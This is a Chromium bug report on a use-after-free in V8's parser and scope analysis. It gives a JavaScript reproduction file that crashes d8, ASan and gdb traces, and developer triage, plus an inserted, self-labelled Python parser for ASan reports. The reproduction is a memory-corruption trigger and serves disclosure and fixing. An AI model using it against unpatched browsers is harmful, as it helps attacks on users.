Status: Fixed
Owner:
Closed: Jul 12
Cc:
Components:
EstimatedDays: ----
NextAction: ----
OS: All
Pri: 1
Type: Bug-Security

Security: Use After Free in v8
Reported by june901...@gmail.com, Jul 11
VULNERABILITY DETAILS

I'm not sure why this vulnerability occurs.
I guess this vulnerability is related to a variable allocation and scoping issue
when v8 compiles test.js.

This vulnerability occurs under the following conditions:
- define a property with an accessor on a global-scoped object
- define local variables within the getter block
- redefine the same object with an accessor among the variable declarations.


VERSION
v8 5.9.211.31 32/64bit version (asan)
v8 6.1.0 (candidate, current master branch) 64bit version (asan)
I tested on Ubuntu 16.04 64-bit.

REPRODUCTION CASE

================ test.js ==================
var proto = {};
Object.defineProperty(proto, 1, {
    get() {
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        Object.defineProperty(proto, 1, { get() {} });
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
    }
});

==========================================

$ ~/v8/out/asan/d8 test.js 
=================================================================
==94791==ERROR: AddressSanitizer: heap-use-after-free on address 0x6250000143e0 at pc 0x563323defddf bp 0x7ffeeb7f7cf0 sp 0x7ffeeb7f7ce8
READ of size 8 at 0x6250000143e0 thread T0
    #0 0x563323defdde  (/home/junekim/v8/out/asan/d8+0x731dde)
    #1 0x563323deb1bf  (/home/junekim/v8/out/asan/d8+0x72d1bf)
    #2 0x563323deb037  (/home/junekim/v8/out/asan/d8+0x72d037)
    #3 0x563323de4d01  (/home/junekim/v8/out/asan/d8+0x726d01)
    #4 0x563323de468a  (/home/junekim/v8/out/asan/d8+0x72668a)
    #5 0x563323fb8b81  (/home/junekim/v8/out/asan/d8+0x8fab81)
    #6 0x563323fcbe27  (/home/junekim/v8/out/asan/d8+0x90de27)
    #7 0x563323fc0df0  (/home/junekim/v8/out/asan/d8+0x902df0)
    #8 0x563323fc64d6  (/home/junekim/v8/out/asan/d8+0x9084d6)
    #9 0x563323ca4af0  (/home/junekim/v8/out/asan/d8+0x5e6af0)
    #10 0x563323ca5bc6  (/home/junekim/v8/out/asan/d8+0x5e7bc6)
    #11 0x563323c3f5c8  (/home/junekim/v8/out/asan/d8+0x5815c8)
    #12 0x563323c3f9ce  (/home/junekim/v8/out/asan/d8+0x5819ce)
    #13 0x563323c51aea  (/home/junekim/v8/out/asan/d8+0x593aea)
    #14 0x563323c56b05  (/home/junekim/v8/out/asan/d8+0x598b05)
    #15 0x563323c5f4be  (/home/junekim/v8/out/asan/d8+0x5a14be)
    #16 0x7f56185a982f  (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)

0x6250000143e0 is located 736 bytes inside of 8192-byte region [0x625000014100,0x625000016100)
freed by thread T0 here:
    #0 0x563323c0fb72  (/home/junekim/v8/out/asan/d8+0x551b72)
    #1 0x5633253a9b42  (/home/junekim/v8/out/asan/d8+0x1cebb42)
    #2 0x563324d4beea  (/home/junekim/v8/out/asan/d8+0x168deea)
    #3 0x563324dc38a3  (/home/junekim/v8/out/asan/d8+0x17058a3)
    #4 0x563324db59d7  (/home/junekim/v8/out/asan/d8+0x16f79d7)
    #5 0x563324dae343  (/home/junekim/v8/out/asan/d8+0x16f0343)
    #6 0x563324dd89d0  (/home/junekim/v8/out/asan/d8+0x171a9d0)
    #7 0x563324dd2576  (/home/junekim/v8/out/asan/d8+0x1714576)
    #8 0x563324dcb5c5  (/home/junekim/v8/out/asan/d8+0x170d5c5)
    #9 0x563324e10dc4  (/home/junekim/v8/out/asan/d8+0x1752dc4)
    #10 0x563324e0ca9a  (/home/junekim/v8/out/asan/d8+0x174ea9a)
    #11 0x563324e0ae81  (/home/junekim/v8/out/asan/d8+0x174ce81)
    #12 0x563324e08247  (/home/junekim/v8/out/asan/d8+0x174a247)
    #13 0x563324d5976c  (/home/junekim/v8/out/asan/d8+0x169b76c)
    #14 0x563324dd3a9c  (/home/junekim/v8/out/asan/d8+0x1715a9c)
    #15 0x563324dcd260  (/home/junekim/v8/out/asan/d8+0x170f260)
    #16 0x563324e10dc4  (/home/junekim/v8/out/asan/d8+0x1752dc4)
    #17 0x563324e0ca9a  (/home/junekim/v8/out/asan/d8+0x174ea9a)
    #18 0x563324e0ae81  (/home/junekim/v8/out/asan/d8+0x174ce81)
    #19 0x563324e08247  (/home/junekim/v8/out/asan/d8+0x174a247)
    #20 0x563324d5976c  (/home/junekim/v8/out/asan/d8+0x169b76c)
    #21 0x563324db7975  (/home/junekim/v8/out/asan/d8+0x16f9975)
    #22 0x563324dec627  (/home/junekim/v8/out/asan/d8+0x172e627)
    #23 0x563324dde9aa  (/home/junekim/v8/out/asan/d8+0x17209aa)
    #24 0x563324daca9c  (/home/junekim/v8/out/asan/d8+0x16eea9c)
    #25 0x563324d3c795  (/home/junekim/v8/out/asan/d8+0x167e795)
    #26 0x563324d3a7e3  (/home/junekim/v8/out/asan/d8+0x167c7e3)
    #27 0x563324e16f8d  (/home/junekim/v8/out/asan/d8+0x1758f8d)
    #28 0x563323fc0f48  (/home/junekim/v8/out/asan/d8+0x902f48)
    #29 0x563323fc64d6  (/home/junekim/v8/out/asan/d8+0x9084d6)

previously allocated by thread T0 here:
    #0 0x563323c0fea3  (/home/junekim/v8/out/asan/d8+0x551ea3)
    #1 0x5633253a9489  (/home/junekim/v8/out/asan/d8+0x1ceb489)
    #2 0x5633253a9e15  (/home/junekim/v8/out/asan/d8+0x1cebe15)
    #3 0x5633253a9c9b  (/home/junekim/v8/out/asan/d8+0x1cebc9b)
    #4 0x563324d28047  (/home/junekim/v8/out/asan/d8+0x166a047)
    #5 0x563324d4aa4f  (/home/junekim/v8/out/asan/d8+0x168ca4f)
    #6 0x563324dc38a3  (/home/junekim/v8/out/asan/d8+0x17058a3)
    #7 0x563324db59d7  (/home/junekim/v8/out/asan/d8+0x16f79d7)
    #8 0x563324dae343  (/home/junekim/v8/out/asan/d8+0x16f0343)
    #9 0x563324dd89d0  (/home/junekim/v8/out/asan/d8+0x171a9d0)
    #10 0x563324dd2576  (/home/junekim/v8/out/asan/d8+0x1714576)
    #11 0x563324dcb5c5  (/home/junekim/v8/out/asan/d8+0x170d5c5)
    #12 0x563324e10dc4  (/home/junekim/v8/out/asan/d8+0x1752dc4)
    #13 0x563324e0ca9a  (/home/junekim/v8/out/asan/d8+0x174ea9a)
    #14 0x563324e0ae81  (/home/junekim/v8/out/asan/d8+0x174ce81)
    #15 0x563324e08247  (/home/junekim/v8/out/asan/d8+0x174a247)
    #16 0x563324d5976c  (/home/junekim/v8/out/asan/d8+0x169b76c)
    #17 0x563324dd3a9c  (/home/junekim/v8/out/asan/d8+0x1715a9c)
    #18 0x563324dcd260  (/home/junekim/v8/out/asan/d8+0x170f260)
    #19 0x563324e10dc4  (/home/junekim/v8/out/asan/d8+0x1752dc4)
    #20 0x563324e0ca9a  (/home/junekim/v8/out/asan/d8+0x174ea9a)
    #21 0x563324e0ae81  (/home/junekim/v8/out/asan/d8+0x174ce81)
    #22 0x563324e08247  (/home/junekim/v8/out/asan/d8+0x174a247)
    #23 0x563324d5976c  (/home/junekim/v8/out/asan/d8+0x169b76c)
    #24 0x563324db7975  (/home/junekim/v8/out/asan/d8+0x16f9975)
    #25 0x563324dec627  (/home/junekim/v8/out/asan/d8+0x172e627)
    #26 0x563324dde9aa  (/home/junekim/v8/out/asan/d8+0x17209aa)
    #27 0x563324daca9c  (/home/junekim/v8/out/asan/d8+0x16eea9c)
    #28 0x563324d3c795  (/home/junekim/v8/out/asan/d8+0x167e795)
    #29 0x563324d3a7e3  (/home/junekim/v8/out/asan/d8+0x167c7e3)

SUMMARY: AddressSanitizer: heap-use-after-free (/home/junekim/v8/out/asan/d8+0x731dde) 
Shadow bytes around the buggy address:
  0x0c4a7fffa820: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c4a7fffa830: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c4a7fffa840: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c4a7fffa850: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c4a7fffa860: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
=>0x0c4a7fffa870: fd fd fd fd fd fd fd fd fd fd fd fd[fd]fd fd fd
  0x0c4a7fffa880: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c4a7fffa890: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c4a7fffa8a0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c4a7fffa8b0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c4a7fffa8c0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
==94791==ABORTING

Without asan, the crash occurs like this:

$ ~/v8/out/x64_release/d8 test.js
Received signal 11 <unknown> 000000000000

==== C stack trace ===============================

 [0x7ff35fe49f14]
 [0x7ff35fa3d390]
 [0x7ff35ee35d49]
 [0x7ff35ee37826]
 [0x7ff35ee34bc9]
 [0x7ff35ee34b38]
 [0x7ff35ee30d9f]
 [0x7ff35ee30a05]
 [0x7ff35ef235e1]
 [0x7ff35ef2b713]
 [0x7ff35ef26e11]
 [0x7ff35ef290c4]
 [0x7ff35ed687ab]
 [0x7ff35ed68e33]
 [0x55903ac2ef1f]
 [0x55903ac2f00c]
 [0x55903ac379d5]
 [0x55903ac397f5]
 [0x55903ac3d8c5]
 [0x7ff35e47f830]
 [0x55903ac2e809]
[end of stack trace]
Segmentation fault (core dumped)

And the following is the gdb stack trace:
Thread 1 "d8" received signal SIGSEGV, Segmentation fault.
(anonymous namespace)::(anonymous namespace)::Scope::MustAllocate (this=<optimized out>, var=<optimized out>)
    at ../../src/ast/scopes.cc:2085
2085      DCHECK(var->location() != VariableLocation::MODULE);
(gdb) bt
#0  (anonymous namespace)::(anonymous namespace)::Scope::MustAllocate (this=<optimized out>, var=<optimized out>)
    at ../../src/ast/scopes.cc:2085
#1  0x00007ffff6fc5826 in operator() (var=<optimized out>, this=<optimized out>) at ../../src/ast/scopes.cc:2241
#2  (anonymous namespace)::(anonymous namespace)::DeclarationScope::NullifyRareVariableIf<(lambda at ../../src/ast/scopes.cc:2241:25)> (id=(anonymous namespace)::(anonymous namespace)::DeclarationScope::RareVariable::kThisFunction, 
    this=<optimized out>, predicate=...) at ../../src/ast/scopes.h:970
#3  (anonymous namespace)::(anonymous namespace)::DeclarationScope::AllocateLocals (this=<optimized out>)
    at ../../src/ast/scopes.cc:2240
#4  0x00007ffff6fc2bc9 in (anonymous namespace)::(anonymous namespace)::Scope::AllocateNonParameterLocalsAndDeclaredGlobals (this=<optimized out>) at ../../src/ast/scopes.cc:2220
#5  (anonymous namespace)::(anonymous namespace)::Scope::AllocateVariablesRecursively (this=<optimized out>)
    at ../../src/ast/scopes.cc:2283
#6  0x00007ffff6fc2b38 in (anonymous namespace)::(anonymous namespace)::Scope::AllocateVariablesRecursively (
    this=<optimized out>) at ../../src/ast/scopes.cc:2269
#7  0x00007ffff6fbed9f in (anonymous namespace)::(anonymous namespace)::DeclarationScope::AllocateVariables (
    this=<optimized out>, info=<optimized out>, isolate=<optimized out>, mode=<optimized out>)
    at ../../src/ast/scopes.cc:1339
#8  0x00007ffff6fbea05 in (anonymous namespace)::(anonymous namespace)::DeclarationScope::Analyze (
    info=<optimized out>, isolate=<optimized out>, mode=<optimized out>) at ../../src/ast/scopes.cc:671
#9  0x00007ffff70b15e1 in (anonymous namespace)::(anonymous namespace)::Compiler::Analyze (info=<optimized out>, 
    isolate=<optimized out>, eager_literals=<optimized out>) at ../../src/compiler.cc:1202
#10 0x00007ffff70b9713 in (anonymous namespace)::(anonymous namespace)::Compiler::Analyze (
    eager_literals=<optimized out>, info=<optimized out>) at ../../src/compiler.cc:1212
#11 (anonymous namespace)::(anonymous namespace)::(anonymous namespace)::CompileUnoptimizedCode (
    info=<optimized out>, inner_function_mode=<optimized out>) at ../../src/compiler.cc:619
#12 0x00007ffff70b4e11 in (anonymous namespace)::(anonymous namespace)::(anonymous namespace)::CompileToplevel (
    info=<optimized out>) at ../../src/compiler.cc:1162
#13 0x00007ffff70b70c4 in (anonymous namespace)::(anonymous namespace)::Compiler::GetSharedFunctionInfoForScript (
    source=..., script_name=..., line_offset=<optimized out>, column_offset=<optimized out>, resource_options=..., 
    source_map_url=..., context=..., extension=<optimized out>, cached_data=<optimized out>, 
    compile_options=<optimized out>, natives=<optimized out>) at ../../src/compiler.cc:1713
#14 0x00007ffff6ef67ab in (anonymous namespace)::ScriptCompiler::CompileUnboundInternal (v8_isolate=<optimized out>, 
    source=<optimized out>, options=<optimized out>) at ../../src/api.cc:2167
#15 0x00007ffff6ef6e33 in (anonymous namespace)::ScriptCompiler::Compile (context=..., source=<optimized out>, 
    options=<optimized out>) at ../../src/api.cc:2226
#16 0x000055555555ef1f in (anonymous namespace)::Shell::CompileString (isolate=<optimized out>, source=..., 
    name=..., compile_options=<optimized out>) at ../../src/d8.cc:486
#17 0x000055555555f00c in (anonymous namespace)::Shell::ExecuteString (isolate=<optimized out>, source=..., 
    name=..., print_result=<optimized out>, report_exceptions=<optimized out>) at ../../src/d8.cc:522
#18 0x00005555555679d5 in (anonymous namespace)::SourceGroup::Execute (this=<optimized out>, isolate=<optimized out>)
    at ../../src/d8.cc:2206
#19 0x00005555555697f5 in (anonymous namespace)::Shell::RunMain (isolate=<optimized out>, argc=<optimized out>, 
    argv=<optimized out>, last_run=<optimized out>) at ../../src/d8.cc:2632
#20 0x000055555556d8c5 in (anonymous namespace)::Shell::Main (argc=<optimized out>, argv=<optimized out>)
    at ../../src/d8.cc:3115
#21 0x00007ffff660d830 in __libc_start_main (main=0x55555556db50 <main(int, char**)>, argc=2, argv=0x7fffffffe598, 
    init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe588)
    at ../csu/libc-start.c:291
#22 0x000055555555e809 in _start ()
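The two ASan reports in this issue (the reporter's unsymbolized one above and the symbolized one further down the thread) carry the same structure: an error header, the access line, the "located N bytes inside of" region line, and three stacks (where the access happened, where the chunk was freed, where it was allocated). For triage at scale those fields are better pulled out mechanically than read by eye. The parser below is an added example, not part of this issue or of V8: it extracts those fields, cross-checks the region arithmetic (736 bytes into an 8192-byte region here), and derives a dedup signature from normalized frame names, falling back to binary+offset when frames are unsymbolized. The sample inputs are constructed excerpts of the reports pasted in this issue, trimmed to three frames per stack.

```python
import re
from collections import namedtuple
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple

# Constructed sample: an excerpt of the symbolized ASan report pasted in this
# issue, trimmed to three frames per stack so the example stays short.
SAMPLE_REPORT = """\
==37066==ERROR: AddressSanitizer: heap-use-after-free on address 0x6250000143e0 at pc 0x555cd04600e0 bp 0x7ffce956a870 sp 0x7ffce956a868
READ of size 8 at 0x6250000143e0 thread T0
    #0 0x555cd04600df in NullifyRareVariableIf<(lambda at ../../src/ast/scopes.cc:2261:25)> src/ast/scopes.h:1018:9
    #1 0x555cd04600df in v8::internal::DeclarationScope::AllocateLocals() src/ast/scopes.cc:2260
    #2 0x555cd045b3ee in AllocateNonParameterLocalsAndDeclaredGlobals src/ast/scopes.cc:2240:27

0x6250000143e0 is located 736 bytes inside of 8192-byte region [0x625000014100,0x625000016100)
freed by thread T0 here:
    #0 0x555cd02bd532 in __interceptor_free (/usr/local/google/home/petermarshall/v8/out/x64.release/d8+0x51f532)
    #1 0x555cd18c706e in DeleteAll src/zone/zone.cc:104:17
    #2 0x555cd18c706e in v8::internal::Zone::~Zone() src/zone/zone.cc:60

previously allocated by thread T0 here:
    #0 0x555cd02bd873 in __interceptor_malloc (/usr/local/google/home/petermarshall/v8/out/x64.release/d8+0x51f873)
    #1 0x555cd18c69b9 in AllocateSegment src/zone/accounting-allocator.cc:85:18
    #2 0x555cd18c69b9 in v8::internal::AccountingAllocator::GetSegment(unsigned long) src/zone/accounting-allocator.cc:75

SUMMARY: AddressSanitizer: heap-use-after-free src/ast/scopes.h:1018:9 in NullifyRareVariableIf<(lambda at ../../src/ast/scopes.cc:2261:25)>
"""
# Constructed sample: the head of the reporter's unsymbolized run (no function names).
UNSYMBOLIZED_SAMPLE = """\
==94791==ERROR: AddressSanitizer: heap-use-after-free on address 0x6250000143e0 at pc 0x563323defddf bp 0x7ffeeb7f7cf0 sp 0x7ffeeb7f7ce8
READ of size 8 at 0x6250000143e0 thread T0
    #0 0x563323defdde  (/home/junekim/v8/out/asan/d8+0x731dde)
"""

HEADER_RE = re.compile(r"^==(\d+)==ERROR: AddressSanitizer: ([\w-]+) on address (0x[0-9a-f]+)")
ACCESS_RE = re.compile(r"^(READ|WRITE) of size (\d+) at 0x[0-9a-f]+ thread T\d+")
# Only the "inside of" wording is handled; that is the form a use-after-free prints.
REGION_RE = re.compile(r"^0x[0-9a-f]+ is located (\d+) bytes inside of (\d+)-byte region \[(0x[0-9a-f]+),(0x[0-9a-f]+)\)")
FRAME_RE = re.compile(r"^\s*#(\d+)\s+0x[0-9a-f]+\s+(.*)$")
# func is "" for an unsymbolized frame; loc is "file:line[:col]" or "(binary+offset)".
Frame = namedtuple("Frame", "index func loc")

@dataclass
class AsanReport:
    pid: int
    kind: str
    addr: int
    op: str = ""
    size: int = 0
    region_offset: Optional[int] = None
    region_size: Optional[int] = None
    region: Optional[Tuple[int, int]] = None          # [lo, hi) of the freed chunk
    stacks: Dict[str, List[Frame]] = field(default_factory=dict)  # access / freed / allocated

def _parse_frame(m) -> Frame:
    idx, rest = int(m.group(1)), m.group(2).strip()
    if rest.startswith("in "):
        rest = rest[3:]
    if rest.startswith("("):              # unsymbolized: only "(binary+offset)" remains
        return Frame(idx, "", rest)
    func, _, loc = rest.rpartition(" ")   # the source location is always the last token
    return Frame(idx, func or rest, loc if func else "")

def parse_asan_report(text: str) -> AsanReport:
    report, section = None, None
    for line in text.splitlines():
        if report is None:                # skip anything before the error header
            if m := HEADER_RE.match(line):
                report = AsanReport(int(m.group(1)), m.group(2), int(m.group(3), 16))
            continue
        if line.startswith("SUMMARY:"):   # shadow-byte dump follows; nothing more to parse
            break
        if m := ACCESS_RE.match(line):
            report.op, report.size, section = m.group(1), int(m.group(2)), "access"
        elif m := REGION_RE.match(line):
            report.region_offset, report.region_size = int(m.group(1)), int(m.group(2))
            report.region = (int(m.group(3), 16), int(m.group(4), 16))
        elif line.startswith(("freed by thread", "previously allocated by thread")):
            section = "freed" if line.startswith("freed") else "allocated"
        elif (m := FRAME_RE.match(line)) and section:
            report.stacks.setdefault(section, []).append(_parse_frame(m))
    assert report is not None, "no AddressSanitizer error header found"
    return report

def region_is_consistent(r: AsanReport) -> bool:
    """Cross-check the printed offset and size against the [lo, hi) bounds."""
    if r.region is None:
        return False
    lo, hi = r.region
    return hi - lo == r.region_size and r.addr - lo == r.region_offset

def _normalize(f: Frame) -> str:
    # Strip template args and parameter lists; unsymbolized frames keep binary+offset.
    return re.split(r"[<(]", f.func, 1)[0] if f.func else f.loc

def crash_signature(r: AsanReport, stack: str = "access", depth: int = 3) -> str:
    """Bug kind plus the top `depth` non-interceptor frames of one stack, for dedup."""
    frames = [f for f in r.stacks.get(stack, []) if not f.func.startswith("__interceptor_")]
    return r.kind + " @ " + " <- ".join(_normalize(f) for f in frames[:depth])
```

`crash_signature(parse_asan_report(SAMPLE_REPORT))` yields the kind plus the top three access frames, and `crash_signature(rep, "freed", 2)` gives `DeleteAll <- v8::internal::Zone::~Zone`, which is the one-line version of the "zone deleted, then used during scope analysis" reading of this crash; `__interceptor_*` frames are dropped because they only name the allocator hook, not the code path.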


I forgot to change the title before submission, sorry :-(
Components: Blink>JavaScript
Labels: Security_Severity-High Security_Impact-Stable OS-All Pri-1
Status: Available
Summary: Security: Use After Free in v8 (was: Security: Use After Free )
Hopefully the v8 sheriff can help triage. Tentatively marking high severity.
Cc: bmeu...@chromium.org mlippautz@chromium.org petermarshall@chromium.org
adding memory sheriffs and compiler folks to the thread. Any clue whats going on?
Project Member Comment 5 by sheriffbot@chromium.org, Jul 11
Labels: M-59
Owner: mlippautz@chromium.org
Status: Assigned
Assigning to mlippautz@ to triage further. Please re-assign as needed.
Cc: -petermarshall@chromium.org
Owner: petermarshall@chromium.org
Assigning to memory sheriff. https://rotation.googleplex.com/index.html#rotation?id=4838401396178944

Please have a look.
Cc: petermarshall@chromium.org
Owner: adamk@chromium.org
It looks like the zone was deleted after ParseFunctionLiteral and then later used under DeclarationScope::Analyze. Could you please take a look?


out/x64.release/d8 ~/test.js 
=================================================================
==37066==ERROR: AddressSanitizer: heap-use-after-free on address 0x6250000143e0 at pc 0x555cd04600e0 bp 0x7ffce956a870 sp 0x7ffce956a868
READ of size 8 at 0x6250000143e0 thread T0
    #0 0x555cd04600df in NullifyRareVariableIf<(lambda at ../../src/ast/scopes.cc:2261:25)> src/ast/scopes.h:1018:9
    #1 0x555cd04600df in v8::internal::DeclarationScope::AllocateLocals() src/ast/scopes.cc:2260
    #2 0x555cd045b3ee in AllocateNonParameterLocalsAndDeclaredGlobals src/ast/scopes.cc:2240:27
    #3 0x555cd045b3ee in v8::internal::Scope::AllocateVariablesRecursively() src/ast/scopes.cc:2304
    #4 0x555cd045b267 in v8::internal::Scope::AllocateVariablesRecursively() src/ast/scopes.cc:2290:12
    #5 0x555cd0453ed2 in v8::internal::DeclarationScope::AllocateVariables(v8::internal::ParseInfo*, v8::internal::Isolate*, v8::internal::AnalyzeMode) src/ast/scopes.cc:1337:3
    #6 0x555cd0453916 in v8::internal::DeclarationScope::Analyze(v8::internal::ParseInfo*, v8::internal::Isolate*, v8::internal::AnalyzeMode) src/ast/scopes.cc:673:10
    #7 0x555cd0611f5b in v8::internal::Compiler::Analyze(v8::internal::ParseInfo*, v8::internal::Isolate*, v8::internal::ThreadedList<v8::internal::ThreadedListZoneEntry<v8::internal::FunctionLiteral*> >*) src/compiler.cc:1133:3
    #8 0x555cd06244e7 in Analyze src/compiler.cc:1143:10
    #9 0x555cd06244e7 in v8::internal::(anonymous namespace)::CompileUnoptimizedCode(v8::internal::CompilationInfo*, v8::internal::ConcurrencyMode) src/compiler.cc:552
    #10 0x555cd0619984 in v8::internal::(anonymous namespace)::CompileToplevel(v8::internal::CompilationInfo*) src/compiler.cc:1098:10
    #11 0x555cd061dd80 in v8::internal::Compiler::GetSharedFunctionInfoForScript(v8::internal::Handle<v8::internal::String>, v8::internal::Handle<v8::internal::Object>, int, int, v8::ScriptOriginOptions, v8::internal::Handle<v8::internal::Object>, v8::internal::Handle<v8::internal::Context>, v8::Extension*, v8::internal::ScriptData**, v8::ScriptCompiler::CompileOptions, v8::internal::NativesFlag) src/compiler.cc:1622:14
    #12 0x555cd034d543 in v8::ScriptCompiler::CompileUnboundInternal(v8::Isolate*, v8::ScriptCompiler::Source*, v8::ScriptCompiler::CompileOptions) src/api.cc:2241:14
    #13 0x555cd034eac6 in v8::ScriptCompiler::Compile(v8::Local<v8::Context>, v8::ScriptCompiler::Source*, v8::ScriptCompiler::CompileOptions) src/api.cc:2300:16
    #14 0x555cd02ec7d8 in v8::Shell::CompileString(v8::Isolate*, v8::Local<v8::String>, v8::Local<v8::Value>, v8::ScriptCompiler::CompileOptions) src/d8.cc:536:12
    #15 0x555cd02ecbdb in v8::Shell::ExecuteString(v8::Isolate*, v8::Local<v8::String>, v8::Local<v8::Value>, bool, bool) src/d8.cc:572:10
    #16 0x555cd0301883 in v8::SourceGroup::Execute(v8::Isolate*) src/d8.cc:2344:10
    #17 0x555cd0307f76 in v8::Shell::RunMain(v8::Isolate*, int, char**, bool) src/d8.cc:2774:34
    #18 0x555cd030b5c0 in v8::Shell::Main(int, char**) src/d8.cc:3224:16
    #19 0x7f8d6dfb4f44 in __libc_start_main /build/eglibc-SvCtMH/eglibc-2.19/csu/libc-start.c:287

0x6250000143e0 is located 736 bytes inside of 8192-byte region [0x625000014100,0x625000016100)
freed by thread T0 here:
    #0 0x555cd02bd532 in __interceptor_free (/usr/local/google/home/petermarshall/v8/out/x64.release/d8+0x51f532)
    #1 0x555cd18c706e in DeleteAll src/zone/zone.cc:104:17
    #2 0x555cd18c706e in v8::internal::Zone::~Zone() src/zone/zone.cc:60
    #3 0x555cd1255e6b in v8::internal::Parser::ParseFunctionLiteral(v8::internal::AstRawString const*, v8::internal::Scanner::Location, v8::internal::FunctionNameValidity, v8::internal::FunctionKind, int, v8::internal::FunctionLiteral::FunctionType, v8::internal::LanguageMode, bool*) src/parsing/parser.cc:2802:3
    #4 0x555cd12c9be8 in v8::internal::ParserBase<v8::internal::Parser>::ParseObjectPropertyDefinition(v8::internal::ParserBase<v8::internal::Parser>::ObjectLiteralChecker*, bool*, bool*, bool*) src/parsing/parser-base.h:2617:35
    #5 0x555cd12bc27a in v8::internal::ParserBase<v8::internal::Parser>::ParseObjectLiteral(bool*) src/parsing/parser-base.h:2698:39
    #6 0x555cd12b4a5d in v8::internal::ParserBase<v8::internal::Parser>::ParsePrimaryExpression(bool*, bool*) src/parsing/parser-base.h:1902:14
    #7 0x555cd12dfae0 in v8::internal::ParserBase<v8::internal::Parser>::ParseMemberExpression(bool*, bool*) src/parsing/parser-base.h:3537:14
    #8 0x555cd12d8936 in v8::internal::ParserBase<v8::internal::Parser>::ParseMemberWithNewPrefixesExpression(bool*, bool*) src/parsing/parser-base.h:3459:10
    #9 0x555cd12d1616 in v8::internal::ParserBase<v8::internal::Parser>::ParseLeftHandSideExpression(bool*) src/parsing/parser-base.h:3264:7
    #10 0x555cd131935e in v8::internal::ParserBase<v8::internal::Parser>::ParsePostfixExpression(bool*) src/parsing/parser-base.h:3234:28
    #11 0x555cd1315592 in v8::internal::ParserBase<v8::internal::Parser>::ParseUnaryExpression(bool*) src/parsing/parser-base.h:3223:12
    #12 0x555cd1313b21 in v8::internal::ParserBase<v8::internal::Parser>::ParseBinaryExpression(int, bool, bool*) src/parsing/parser-base.h:3099:19
    #13 0x555cd1310f17 in v8::internal::ParserBase<v8::internal::Parser>::ParseConditionalExpression(bool, bool*) src/parsing/parser-base.h:3065:28
    #14 0x555cd1264388 in v8::internal::ParserBase<v8::internal::Parser>::ParseAssignmentExpression(bool, bool*) src/parsing/parser-base.h:2846:18
